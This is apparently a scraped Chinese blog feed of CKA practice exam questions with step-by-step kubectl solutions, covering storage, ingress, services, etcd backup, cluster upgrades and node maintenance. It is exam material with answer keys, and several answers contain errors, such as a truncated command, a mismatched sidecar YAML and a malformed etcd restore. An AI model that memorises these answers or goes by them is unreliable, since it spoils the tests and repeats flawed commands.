把你的发现写进文件 /opt/course/8/controlplan-components.txt 。该文件的结构应该是这样的。

# /opt/course/8/controlplane-components.txt
kubelet: [TYPE]
kube-apiserver: [TYPE]
kube-scheduler: [TYPE]
kube-controller-manager: [TYPE]
etcd: [TYPE]
dns: [TYPE] [NAME]

TYPE 为: not-installed , process , static-pod , pod

解答

kubectl config use-context k8s-c1-H

检查kubelet

ssh cluster1-controlplane1
root@cluster1-controlplane1:~# ps aux | grep kubelet #显示kubelet进程

我们可以通过systemd查看哪些组件是通过systemd控制的

root@cluster1-controlplane1:~# find /etc/systemd/system/ | grep kube

Controplane-info-0

这个集群是用kubeadm设置的，所以我们在默认的清单目录中检查一下

root@cluster1-controlplane1:~# find /etc/kubernetes/manifests/

Controplane-info-1

这意味着主要的4个控制板服务被设置为静态Pod。实际上，让我们检查一下在控制平面节点上的kube-system命名空间中运行的所有Pods,在这里我们看到了5个静态pod，后缀为-cluster1-controlplane1

kubectl -n kube-system get pod -o wide | grep controlplane1

Controplane-info-2

检查dns

root@cluster1-controlplane1$ kubectl -n kube-system get ds,deploy

Controplane-info-3

退出controlplane1远程, 编辑文件

# /opt/course/8/controlplane-components.txt
kubelet: process
kube-apiserver: static-pod
kube-scheduler: static-pod
kube-controller-manager: static-pod
etcd: static-pod
dns: pod coredns

Controplane-info-4

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 7 | Node and Pod Resource Usage /archives/kubernetes/CKA/Resource.html

Use context: kubectl config use-context k8s-c1-H

The metrics-server has been installed in the cluster. Your college would like to know the kubectl commands to:

show Nodes resource usage show Pods and their containers resource usage Please write the commands into /opt/course/7/node.sh and /opt/course/7/pod.sh .

译文

在集群中已经安装了metrics-server。你们学院想知道使用 kubectl 的命令获取如下信息。

显示节点资源使用情况
显示Pod和其容器的资源使用情况

请将这些命令写入/opt/course/7/node.sh 和 /opt/course/7/pod.sh 。

解答

参考: kubectl top node -h kubectl top pod -h

kubectl top node
echo "kubectl top node" > /opt/course/7/node.sh

kubectl top pod --containers=true
echo "kubectl top pod --containers=true" > /opt/course/7/pod.sh

Resource-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 6 | Storage, PV, PVC, Pod volume /archives/kubernetes/CKA/create-pv-2.html

Use context: kubectl config use-context k8s-c1-H

Create a new PersistentVolume named safari-pv . It should have a capacity of 2Gi , accessMode ReadWriteOnce , hostPath /Volumes/Data and no storageClassName defined.

Next create a new PersistentVolumeClaim in Namespace project-tiger named safari-pvc . It should request 2Gi storage, accessMode ReadWriteOnce and should not define a storageClassName. The PVC should bound to the PV correctly.

Finally create a new Deployment safari in Namespace project-tiger which mounts that volume at /tmp/safari-data . The Pods of that Deployment should be of image httpd:2.4.41-alpine .

译文

创建一个新的PersistentVolume，名为 safari-pv 。它的容量为 2Gi ，访问模式为 ReadWriteOnce ，主机路径为 /Volumes/Data ，不定义存储类别名称。

接下来在namespace project-tiger创建一个新的 PersistentVolumeClaim ，命名为 safari-pvc 。它应该请求 2Gi 存储，访问模式 ReadWriteOnce ，并且不应该定义存储类名称。PVC应该正确地绑定到PV上。

最后在名字空间 project-tiger 中创建一个新的部署 safari ，将该卷挂载在 /tmp/safari-data 。该部署Pod的镜像是 httpd:2.4.41-alpine

解答

pv可参考
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/#create-a-pv

vim 6_pv.yaml

6_pv.yaml

# 6_pv.yaml
kind: PersistentVolume
apiVersion: v1
metadata:
 name: safari-pv
spec:
 capacity:
  storage: 2Gi
 accessModes:
  - ReadWriteOnce
 hostPath:
  path: "/Volumes/Data"

创建pv

k -f 6_pv.yaml

pvc可参考
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/#create-a-pvc

vim 6_pvc.yaml

6_pvc.yaml

# 6_pvc.yaml
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: safari-pvc
  namespace: project-tiger
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
     storage: 2Gi

创建pvc

k -f 6_pvc.yaml create

检查pv,pvc绑定情况

k -n project-tiger get pv,pvc

create-pv-2-0

创建一个部署并挂载卷,可以参考
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/#create-a-pod

k -n project-tiger create deploy safari \
  --image=httpd:2.4.41-alpine $do > 6_dep.yaml
vim 6_dep.yaml

6_dep.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  creationTimestamp: null
  labels:
    app: safari
  name: safari
  namespace: project-tiger
spec:
  replicas: 1
  selector:
    matchLabels:
      app: safari
  strategy: {}
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: safari
    spec:
      volumes:                                      # add
      - name: data                                  # add
        persistentVolumeClaim:                      # add
          claimName: safari-pvc                     # add
      containers:
      - image: httpd:2.4.41-alpine
        name: container
        volumeMounts:                               # add
        - name: data                                # add
          mountPath: /tmp/safari-data               # add

创建pod

k -f 6_dep.yaml create

检查pod挂载情况

k -n project-tiger describe pod safari-xxx-xxx  | grep -i -A2 mounts

create-pv-2-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 5 | Kubectl sorting /archives/kubernetes/CKA/pod-sort.html

Use context: kubectl config use-context k8s-c1-H

There are various Pods in all namespaces. Write a command into /opt/course/5/find_pods.sh which lists all Pods sorted by their AGE ( metadata.creationTimestamp ).

Write a second command into /opt/course/5/find_pods_uid.sh which lists all Pods sorted by field metadata.uid . Use kubectl sorting for both commands.

译文

在所有命名空间中都有各种Pod。
在 /opt/course/5/find_pods.sh 中写一条命令，列出所有按AGE metadata.createTimestamp 排序的Pod。
在 /opt/course/5/find_pods_uid.sh 中编写第二条命令，列出所有按 metadata.uid 排序的Pod。
两个命令都使用 kubectl 排序。

解答

kubectl get pod -A --sort-by=.metadata.creationTimestamp
echo "kubectl get pod -A --sort-by=.metadata.creationTimestamp" > /opt/course/5/find_pods.sh
bash /opt/course/5/find_pods.sh

pod-sort-0

echo "kubectl get pod -A --sort-by=.metadata.uid" > /opt/course/5/find_pods_uid.sh
bash /opt/course/5/find_pods_uid.sh

pod-sort-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 4 | Pod Ready if Service is reachable /archives/kubernetes/CKA/readlinessprobe.html

Task weight: 4%

Use context: kubectl config use-context k8s-c1-H

Do the following in Namespace default. Create a single Pod named ready-if-service-ready of image nginx:1.16.1-alpine . Configure a LivenessProbe which simply executes command true . Also configure a ReadinessProbe which does check if the url http://service-am-i-ready:80 is reachable, you can use wget -T2 -O- http://service-am-i-ready:80 for this. Start the Pod and confirm it isn’t ready because of the ReadinessProbe.

Create a second Pod named am-i-ready of image nginx:1.16.1-alpine with label id: cross-server-ready . The already existing Service service-am-i-ready should now have that second Pod as endpoint.

Now the first Pod should be in ready state, confirm that.

译文

在默认命名空间中执行以下操作。创建名为 ready-if-service-ready 的单个 Pod，镜像为 nginx:1.16.1-alpine 。配置一个只执行命令 true 的 LivenessProbe。还要配置一个 ReadinessProbe ，它会检查 url http://service-am-i-ready:80 是否可达，您可以为此使用 wget -T2 -O- http://service-am-i-ready:80 . 启动 Pod 并确认它因 ReadinessProbe 而未就绪。

创建第二个名为 am-i-ready 的 Pod，镜像为 nginx:1.16.1-alpine ，标签 id: cross-server-ready 。已经存在的服务 service-am-i-ready 现在应该将第二个 Pod 作为端点。

现在第一个 Pod 应该处于就绪状态，确认一下。

解答

创建pod文件

k run ready-if-service-ready --image=nginx:1.16.1-alpine $do > 4_pod1.yaml
vim 4_pod1.yaml

4_pod1.yaml

# 4_pod1.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: ready-if-service-ready
  name: ready-if-service-ready
spec:
  containers:
  - image: nginx:1.16.1-alpine
    name: ready-if-service-ready
    resources: {}
    livenessProbe:                                      # add from here
      exec:
        command:
        - 'true'
    readinessProbe:
      exec:
        command:
        - sh
        - -c
        - 'wget -T2 -O- http://service-am-i-ready:80'   # to here
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

应用文件创建pod

k -f 4_pod1.yaml create

检查pod状态

k get pod ready-if-service-ready

readlinessprobe-0

使用describe检查原因

k describe pod ready-if-service-ready

readlinessprobe-1

创建第二个pod

k run am-i-ready --image=nginx:1.16.1-alpine --labels="id=cross-server-ready"

检查服务和Endpoint

k describe svc service-am-i-ready
k get ep

readlinessprobe-2

检查第一个pod运行状态

k get pod ready-if-service-ready

readlinessprobe-3

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 3 | Scale down StatefulSet /archives/kubernetes/CKA/statefulset-scale.html

Use context: kubectl config use-context k8s-c1-H

There are two Pods named o3db-** in Namespace project-c13. C13 management asked you to scale the Pods down to one replica to save resources.

译文

名称空间 project-c13 中有两个名为 o3db-** 的Pod。C13管理层要求你将Pods缩减到一个副本，以节省资源。

解答

检查pods

k -n project-c13 get pod | grep o3db

statefulset-scale-0

检查常用资源

k -n project-c13 get deploy,ds,sts | grep o3db

statefulset-scale-1

查看pod标签,可以看到statefulset字段

k -n project-c13 get pod --show-labels | grep o3db

statefulset-scale-2

对statefulset中3db进行缩容

k -n project-c13 scale sts o3db --replicas 1
k -n project-c13 get sts o3db

statefulset-scale-3

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 2 | Schedule Pod on Controlplane Node /archives/kubernetes/CKA/node-schedule-2.html

Task weight: 3%

Use context: kubectl config use-context k8s-c1-H

Create a single Pod of image httpd:2.4.41-alpine in Namespace default . The Pod should be named pod1 and the container should be named pod1-container . This Pod should only be scheduled on a controlplane node, do not add new labels any nodes.

译文

在namespace default 中创建一个 httpd:2.4.41-alpine 的Pod。这个Pod应该被命名为 pod1 ，容器应该被命名为 pod1-container 。这个Pod应该只被安排在控制平面节点上，不要在任何节点上添加新的标签。

解答

切换集群环境

kubectl config use-context k8s-c1-H

首先，我们找到控制平面节点和它们的污点

k get node #找到controlplane节点
k describe node cluster1-controlplane1 | grep -i taints -A1 #查看节点污点
k get node cluster1-controlplane1 --show-labels #查看节点标签

node-selector-2-0

创建一个pod模板

k run pod1 --image=httpd:2.4.41-alpine $do > 2.yaml
vim 2.yaml

2.yaml

# 2.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: pod1
  name: pod1
spec:
  containers:
  - image: httpd:2.4.41-alpine
    name: pod1-container                       # change
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
  tolerations:                                 # add
  - effect: NoSchedule                         # add
    key: node-role.kubernetes.io/control-plane # add
  nodeSelector:                                # add
    node-role.kubernetes.io/control-plane: ""  # add
status: {}

创建pod

k -f 2.yaml create

node-selector-2-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 1 | Contexts /archives/kubernetes/CKA/Contexts.html

Task weight: 1%

You have access to multiple clusters from your main terminal through kubectl contexts. Write all those context names into /opt/course/1/contexts .

Next write a command to display the current context into /opt/course/1/context_default_kubectl.sh , the command should use kubectl.

Finally write a second command doing the same thing into /opt/course/1/context_default_no_kubectl.sh , but without the use of kubectl.

译文

你可以通过 kubectl contexts 从你的主终端访问多个集群。把所有这些上下文的名字写进 /opt/course/1/contexts 。

接下来写一条显示当前环境的命令到 /opt/course/1/context_default_kubectl.sh ，该命令应使用 kubectl 。

最后写第二条命令做同样的事情到 /opt/course/1/context_default_no_kubectl.sh ，但不使用 kubectl 。

解答:

k config get-contexts # copy manually
k config get-contexts -o name > /opt/course/1/contexts

Contexts-0

kubectl config current-context
echo "kubectl config current-context" > /opt/course/1/context_default_kubectl.sh
bash /opt/course/1/context_default_kubectl.sh

Contexts-1

cat ~/.kube/config | grep current | awk '{printf $2}'
echo "cat ~/.kube/config | grep current | awk '{printf $2}'" > /opt/course/1/context_default_no_kubectl.sh

Contexts-2

Killer.sh CKA模拟题目汇总

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | 练习环境设置变量及vim参数 /archives/kubernetes/CKA/env-setting.html 为了方便的在考试模拟环境中高效的操作和练习, 建议进行如下设置

设置kubectl别名k

alias k=kubectl

设置一些全局变量

export do="--dry-run=client -oyaml"
export now="--force --grace-period 0"

设置vim ~/.vimrc

set tabstop=2
set expandtab
set shiftwidth=2
set ai

也可以缩写为

echo "set  ai ts=2 sw=2 et" >> ~/.vimrc
source ~/.vimrc

含义:

ai = auto indent，自动退格对齐
set tabstop=2（ts=tabstop，即一个tab的宽度被设为2个空格辣么宽）
set shiftwidth=2（sw=shiftwidth，即退格对齐以2个空格为准）
set expandtab（et=expandtab，将tab变成空格）

以上设置killer.sh一般已经设置好

检查

alias
echo $do

env-setting-0

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟题库 | 17. 节点维护 /archives/kubernetes/CKA/node-drain.html 模拟题目

设置配置环境：

kubectl config use-context ek8s

Task

将名为 node02 的 node 设置为不可用，并重新调度该 node 上所有运行的 pods。

参考

任务 –> 管理集群 –> 安全地清空一个节点
https://kubernetes.io/zh-cn/docs/tasks/administer-cluster/safely-drain-node/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

kubectl get nodes
kubectl cordon node02
kubectl get nodes
kubectl drain node02 --ignore-daemonsets --delete-emptydir-data --force

检查

kubectl get node
kubectl get pod -A -o wide | grep node02

]]> kubernetes CKA CKA K8s CKA 模拟题库 | 16. 排查集群中故障节点 /archives/kubernetes/CKA/node-check.html 模拟题目

设置配置环境：

kubectl config use-context wk8s

Task

名为 node02 的 Kubernetes worker node 处于 NotReady 状态。调查发生这种情况的原因，并采取相应的措施将 node 恢复为 Ready 状态，确保所做的任何更改永久生效。
可以使用以下命令，通过ssh连接到node02节点： ssh node02
可以使用以下命令，在该节点上获取更高权限： sudo -i

参考

检查服务
https://kubernetes.io/zh-cn/docs/setup/production-environment/tools/kubeadm/kubelet-integration/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

检查故障节点

kubectl get nodes

node-check-0

切换到故障节点

ssh node02
sudo -i

systemctl status kubelet
systemctl enable kubelet --now

检查

systemctl status kubelet
kubectl get nodes

]]> kubernetes CKA CKA K8s CKA 模拟题库 | 15. 备份还原etcd /archives/kubernetes/CKA/etcd.html 模拟题目

设置配置环境此项目无需更改配置环境。但是，在执行此项目之前，请确保您已返回初始节点。
[candidate@master01] $ exit

[candidate@master01] #

注意，这个之前是在master01上，所以要exit退到node01，如果已经是node01了，就不要再exit了。

Task

首先，为运行在 https://11.0.1.111:2379 上的现有 etcd 实例创建快照并将快照保存到 /var/lib/backup/etcd-snapshot.db
（注意，真实考试中，这里写的是 https://127.0.0.1:2379 为给定实例创建快照预计能在几秒钟内完成。
如果该操作似乎挂起，则命令可能有问题。用 CTRL + C 来取消操作，然后重试。
然后还原位于 /data/backup/etcd-snapshot-previous.db 的现有先前快照。提供了以下 TLS证书和密钥，以通过 etcdctl 连接到服务器。

CA 证书: /opt/KUIN00601/ca.crt
客户端证书: /opt/KUIN00601/etcd-client.crt
客户端密钥: /opt/KUIN00601/etcd-client.key

参考

任务 –> 管理集群 –> 为 Kubernetes 运行 etcd 集群
https://kubernetes.io/zh-cn/docs/tasks/administer-cluster/configure-upgrade-etcd/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s
特别注意，etcd这道题，在考试时做完后，就不要回头检查或者操作了。因为它是用的前一道题的集群，所以一旦你回头再做时，切换错集群了，且又将etcd还原了，反而可能影响别的考题

备份etcd

export ETCDCTL_API=3
etcdctl  \
--endpoints="https://127.0.0.1:2379" \
--cacert="/opt/KUIN00601/ca.crt" \
--cert="/opt/KUIN00601/etcd-client.crt" \
--key="/opt/KUIN00601/etcd-client.key" \
snapshot save /var/lib/backup/etcd-snapshot.db

恢复etcd

sudo ETCDCTL_API=3
etcdctl \
--endpoints="https://127.0.0.1:2379" \
--cacert="/opt/KUIN00601/ca.crt" \
--cert="/opt/KUIN00601/etcd-client.crt" \
--key="/opt/KUIN00601/etcd-client.key" \
snapshot restore /data/backup/etcd-snapshot-previous.db

检查

etcdctl snapshot status /var/lib/backup/etcd-snapshot.db -wtable  
# 考试时，这些检查动作，都可以不做

]]> kubernetes CKA CKA K8s etcd CKA 模拟题库 | 14. 升级集群 /archives/kubernetes/CKA/cluster-update.html 模拟题目

设置配置环境：

kubectl config use-context mk8s

Task

现有的Kubernetes 集群正在运行版本 1.25.1 。仅将master节点上的所有 Kubernetes控制平面 和 节点组件 升级到版本 1.25.2 。
确保在升级之前 drain master 节点，并在升级后 uncordon master 节点。
可以使用以下命令，通过ssh连接到master节点： ssh master01
可以使用以下命令，在该master节点上获取更高权限： sudo -i
另外，在 主节点 上升级 kubelet 和 kubectl 。请不要升级 工作节点 ，etcd ，container 管理器，CNI插件， DNS服务 或任何其他插件。

参考

任务 –> 管理集群 –> 用 kubeadm 进行管理 –> 升级 kubeadm 集群
https://kubernetes.io/zh-cn/docs/tasks/administer-cluster/kubeadm/kubeadm-upgrade/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

kubectl get nodes

维护和驱逐

kubectl cordon master01
kubectl drain master01 --ignore-daemonsets

连接master01 并提升权限

ssh master01
sudo -i

更新软件列表查看可更新版本, 升级对应版本

apt-get update
apt-cache show kubeadm | grep 1.25.2
apt-get install kubeadm=1.25.2-00 kubelet=1.25.2-00 kubectl=1.25.2-00
kubeadm upgrade apply v1.25.2 --etcd-upgrade=false

更新时如果提示无法升级,可能是设置了hold,用unhold解除标记再更新

# 解除 阻止更新 标记
apt-mark unhold kubeadm kubectl kubelet

# 设置软件包保留,阻止自动更新
apt-mark hold kubeadm kubectl kubelet

kubeadm version
kubelet --version
kubectl version

重启kubelet

sudo systemctl daemon-reload
sudo systemctl restart kubelet

恢复master01 调度

kubectl uncordon master01

检查

kubectl get node

]]> kubernetes CKA CKA K8s cluster CKA 模拟题库 | 13. 使用 sidecar 代理容器日志 /archives/kubernetes/CKA/sidecar-log.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Context

将一个现有的 Pod 集成到 Kubernetes 的内置日志记录体系结构中（例如 kubectl logs）。添加 streaming sidecar 容器是实现此要求的一种好方法。

Task

使用 busybox Image来将名为 sidecar 的 sidecar 容器添加到现有的 Pod 11-factor-app 中。新的 sidecar 容器必须运行以下命令： /bin/sh -c tail -n+1 -f /var/log/11-factor-app.log 使用挂载在 /var/log 的 Volume，使日志文件 11-factor-app.log 可用于 sidecar 容器。除了添加所需要的 volume mount 以外，请勿更改现有容器的规格。

参考

概念 –> 集群管理 –> 日志架构
https://kubernetes.io/zh-cn/docs/concepts/cluster-administration/logging/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

导出pod文件并备份

kubectl get pod 11-factor-app -o yaml > varlog.yaml
cp varlog.yaml varlog-bak.yaml

删除原pod

kubectl delete pod 11-factor-app
kubectl get pod 11-factor-app

编辑文件

vim varlog.yaml

  - name: varlog
    mountPath: /var/log

- name: count-log-2
  image: busybox:1.28
  args: [/bin/sh, -c, 'tail -n+1 -F /var/log/2.log']
  volumeMounts:
  - name: varlog
    mountPath: /var/log

#volumes:
- name: varlog
  emptyDir: {}

sidecar-log-0

应用文件

kubectl apply -f 11-factor-app.yaml

检查

kubectl logs 11-factor-app sidecar
kubectl  exec 11-factor-app -c sidecar -- tail -f /var/log/11-factor-app.log
kubectl  exec 11-factor-app -c count-- tail -f /var/log/11-factor-app.log

sidecar-log-1
sidecar-log-2
sidecar-log-3

]]> kubernetes CKA CKA K8s sidecar CKA 模拟题库 | 12. 查看Pod日志 /archives/kubernetes/CKA/pod-logs.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

监控 pod foo 的日志并：提取与错误 RLIMIT_NOFILE 相对应的日志行将这些日志行写入 /opt/KUTR00101/foo

参考

kubectl log -h
https://kubernetes.io/zh-cn/docs/tasks/debug/debug-application/debug-running-pod/#examine-pod-logs

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

kubectl logs foo | grep -i "RLIMIT_NOFILE" > /opt/KUTR00101/foo

检查

cat /opt/KUTR00101/foo

pod-logs-0

]]> kubernetes CKA CKA K8s CKA 模拟题库 | 11. 创建PVC /archives/kubernetes/CKA/create-pvc.html 模拟题目

设置配置环境：

kubectl config use-context ok8s

Task

创建一个新的 PersistentVolumeClaim ：

名称: pv-volume
Class: csi-hostpath-sc
容量: 10Mi

创建一个新的 Pod ，来将 PersistentVolumeClaim 作为 volume 进行挂载：

名称：web-server
Image：nginx:1.16
挂载路径：/usr/share/nginx/html
配置新的Pod，以对 volume 具有 ReadWriteOnce 权限。

最后，使用 kubectl edit 或 kubectl patch 将 PersistentVolumeClaim 的容量扩展为 70Mi ，并记录此更改。

参考

任务 –> 配置 Pods 和容器 –> 配置 Pod 以使用 PersistentVolume 作为存储
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

vim pvc.yaml

pvc.yaml

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pv-volume  #pvc名字
spec:
  storageClassName: csi-hostpath-sc  # class名
  accessModes:
    - ReadWriteOnce  # 注意，考试时的访问模式可能有ReadWriteMany和ReadOnlyMany和ReadWriteOnce，根据题目要求写。
  resources:
    requests:
      storage: 10Mi  # 大小

kubectl apply -f pvc.yaml

vim pvc-pod.yaml

pvc-pod.yaml

apiVersion: v1
kind: Pod
metadata:
  name: web-server
spec:
  volumes:
    - name: task-pv-storage # 两处name需要一样
      persistentVolumeClaim:
        claimName: pv-volume  # 这个要使用上面创建的pvc名字
  containers:
    - name: nginx
      image: nginx:1.16  # 使用指定镜像
      volumeMounts:
        - mountPath: "/usr/share/nginx/html" # 挂载容器内位置
          name: task-pv-storage # 两处name需要一样

kubectl apply -f pvc-pod.yaml

修改PVC配置

kubectl edit pvc pv-volume --record

修改大小 70Mi

create-pvc-0

检查

kubectl get pvc
kubectl get pod web-server

]]> kubernetes CKA CKA K8s pvc CKA 模拟题库 | 10. 创建PV /archives/kubernetes/CKA/create-pv.html 模拟题目

设置配置环境：

kubectl config use-context hk8s

Task

创建名为 app-config 的 persistent volume，容量为 1Gi，访问模式为 ReadWriteMany。 volume 类型为 hostPath ，位于 /srv/app-config

参考

任务 –> 配置 Pods 和容器 –> 配置 Pod 以使用 PersistentVolume 作为存储
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

vim pv.yaml

pv.yaml

apiVersion: v1
kind: PersistentVolume
metadata:
  name: app-config
 # labels:
 #   type: local
spec:
 # storageClassName: manual
  capacity:
    storage: 1Gi
  accessModes:
    - ReadWriteMany
  hostPath:
    path: "/srv/app-config"

应用文件

kubectl apply -f pv.yaml

检查

kubectl get pv

create-pv-0

]]> kubernetes CKA pv CKA K8s CKA 模拟题库 | 9. 创建多容器Pod /archives/kubernetes/CKA/multi-container.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

按如下要求调度一个Pod：

名称：kucc8
app containers: 2
container 名称/images：
- nginx
- consul

参考

概念 –> 工作负载 –> Pod
https://kubernetes.io/zh-cn/docs/concepts/workloads/pods/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

vim pod-kucc.yaml

apiVersion: v1
kind: Pod
metadata:
  name: kucc8
spec:
  containers:
  - name: nginx
    image: nginx
    imagePullPolicy: IfNotPresent
  - name: consul
    image: consul
    imagePullPolicy: IfNotPresent

应用文件

kubectl apply -f pod-kucc.yaml

也可以通过 –dry-run 生成一个简单yaml文件,然后编辑

kubectl run kucc8 --image=nginx --dry-run client -oyaml > pod-kucc.yaml
vim pod-kucc.yaml

检查

kubectl get pod kucc8

multi-container-0

]]> kubernetes CKA CKA K8s CKA 模拟题库 | 8. 查看可用节点数量 /archives/kubernetes/CKA/get-node.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

检查有多少 nodes 已准备就绪（不包括被打上 Taint：NoSchedule 的节点），并将数量写入 /opt/KUSC00402/kusc00402.txt

参考

概念 –> 调度、抢占和驱逐 –> 污点和容忍度
https://kubernetes.io/zh-cn/docs/concepts/scheduling-eviction/taint-and-toleration/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

ready 的数量减去 noschedule 的数量为可用节点数

kubectl get nodes
kubectl describe nodes | grep -i taints
echo "结果" > /opt/KUSC00402/kusc00402.txt

get-node-0

检查

cat /opt/KUSC00402/kusc00402.txt

]]> kubernetes CKA CKA K8s CKA 模拟题库 | 7. 调度 pod 到指定节点 /archives/kubernetes/CKA/node-schedule-1.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

按如下要求调度一个 pod：
名称：nginx-kusc00401
Image：nginx
Node selector：disk=ssd

参考

任务 –> 配置 Pods 和容器 –> 将pod分配给节点
https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/assign-pods-nodes/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

# 检查pod是否存在
kubectl get pod -A | grep nginx-kusc00401

# 检查node标签是否存在 disk=ssd
kubectl get nodes --show-labels | grep 'disk=ssd'

# 如果没有ssd标签则手动设置一个
#kubectl label nodes node01 disk=ssd

node-selector-0

# 创建文件
vim  pod-disk-ssd.yaml

apiVersion: v1
kind: Pod
metadata:
  name: nginx-kusc00401
  labels:
spec:
  containers:
  - name: nginx
    image: nginx
    imagePullPolicy: IfNotPresent
  nodeSelector:
    disk: ssd

kubectl apply -f pod-disk-ssd.yaml

检查

kubectl get pod nginx-kusc00401 -o wide

node-selector-1

]]> kubernetes CKA CKA K8s node-selector CKA 模拟题库 | 6. 扩容 deployment 副本数量 /archives/kubernetes/CKA/deployment-scale.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

将 deployment presentation 扩展至 4 个 pods

参考

kubectl scale deployment -h
https://kubernetes.io/zh-cn/docs/tasks/run-application/scale-stateful-set/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

#检查pod数量和运行情况
kubectl get deployments presentation -o wide
kubectl get pod -l app=presentation

#扩展数量
kubectl scale deployment presentation  --replicas=4

检查

kubectl get deployments presentation -o wide
kubectl get pod -l app=presentation

]]> kubernetes CKA CKA K8s scale CKA 模拟题库 | 5. 创建 Ingress /archives/kubernetes/CKA/ingress.html 模拟题目

设置配置环境：

kubectl config use-context k8s

Task

如下创建一个新的nginx Ingress 资源：
名称: ping
Namespace: ing-internal
使用服务端口 5678
在路径 /hello 上公开服务 hello 可以使用以下命令检查服务 hello 的可用性，该命令应返回 hello：
curl -kL INTERNAL_IP/hello

参考

概念 –> 服务、负载均衡和联网 –> Ingress
https://kubernetes.io/zh-cn/docs/concepts/services-networking/ingress/#the-ingress-resource
https://kubernetes.io/zh-cn/docs/concepts/services-networking/ingress/#default-ingress-class

解答

方法1 (推荐)

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

vim ingress.yaml

apiVersion: networking.k8s.io/v1
kind: IngressClass
metadata:
  labels:
    app.kubernetes.io/component: controller
  name: nginx-example #考试时没有ingressClassName手动创建一个
  annotations:
    ingressclass.kubernetes.io/is-default-class: "true"
spec:
  controller: k8s.io/ingress-nginx
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ping
  namespace: ing-internal
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  ingressClassName: nginx-example
  rules:
  - http:
      paths:
      - path: /hello
        pathType: Prefix
        backend:
          service:
            name: hello
            port:
              number: 5678

kubectl apply -f ingress.yaml

方法2 (暂不推荐,考试时有问题)

kubectl create ingress ping --rule=/hello=hello:5678 --class=nginx --annotation=nginx.ingress.kubernetes.io/rewrite-target=/ -n ing-internal

检查

kubectl get ingress -n ing-internal
curl ingressIP/hello

ingress-0

]]> kubernetes CKA CKA K8s ingress CKA 模拟题库 | 4. 暴露服务 service /archives/kubernetes/CKA/service.html 模拟考题

设置配置环境：
kubectl config use-context k8s

Task

请重新配置现有的 deployment front-end 以及添加名为 http 的端口规范来公开现有容器 nginx 的端口 80/tcp 。
创建一个名为 front-end-svc 的新 service ，以公开容器端口 http 。
配置此 service ，以通过各个 Pod 所在的节点上的 NodePort 来公开他们。

参考

概念 –> 工作负载 –> 工作负载资源 –> Deployments
https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/deployment/

解答

考试的时候务必记住切换集群, 注意集群名称 kubectl config use-context k8s

检查deployment信息，并记录SELECTOR的Lable标签，这里是app=front-end

kubectl get deployment front-end -o wide

编辑 front-end

kubectl edit deployment front-end

spec下 name:nginx 行后添加

ports:
- name: http
  containerPort: 80
  protocol: TCP

暴露端口:

kubectl expose deployment front-end --type=NodePort --port=80 --target-port=80 --name=front-end-svc

# 注意考试中需要创建的是NodePort，还是ClusterIP。如果是ClusterIP，则应为--type=ClusterIP
# --port是service的端口号
# --target-port是deployment里pod的容器的端口号

service-0

检查

暴露服务后，检查一下service的selector标签是否正确，这个要与deployment的selector标签一致

kubectl get svc front-end-svc -o wide
kubectl get deployment front-end -o wide

service-1

如果你kubectl expose暴露服务后，发现service的selector标签是空的，或者不是deployment的，如下图这样：

service-2

则需要编辑此service，手动添加标签

kubectl edit svc front-end-svc

在ports这一小段下面添加selector标签 selector: app: front-end #注意yaml里是写冒号，而不是等号，不是app=front-end

service-3

确保service的selector标签与deployment的selector标签一致

service-4

kubectl get pod,svc -o wide

curl 所在的node的ip或主机名:30xxx
curl svc的ip地址:80

